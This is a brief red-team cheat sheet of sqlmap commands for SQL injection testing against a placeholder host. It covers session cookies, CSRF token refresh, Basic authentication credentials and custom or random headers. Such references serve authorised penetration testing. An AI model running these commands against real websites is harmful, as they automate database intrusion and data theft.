# Cookie
sqlmap -u "http://t/?id=1" --cookie="PHPSESSID=deadbeef; role=user" --batch
# Auto-refresh CSRF token
sqlmap -r req.txt --csrf-token=csrf --batch
# If token comes from another URL
sqlmap -r req.txt --csrf-token=csrf --csrf-url="http://t/form"
# HTTP auth
sqlmap -u "http://t/area" --auth-type=Basic --auth-cred="user:pass" --batch
# Headers / UA
sqlmap -u "http://t/?id=1" --random-agent --headers="X-Api: 123" --batch
RED TEAM / SQL / SQLMAP / HTTP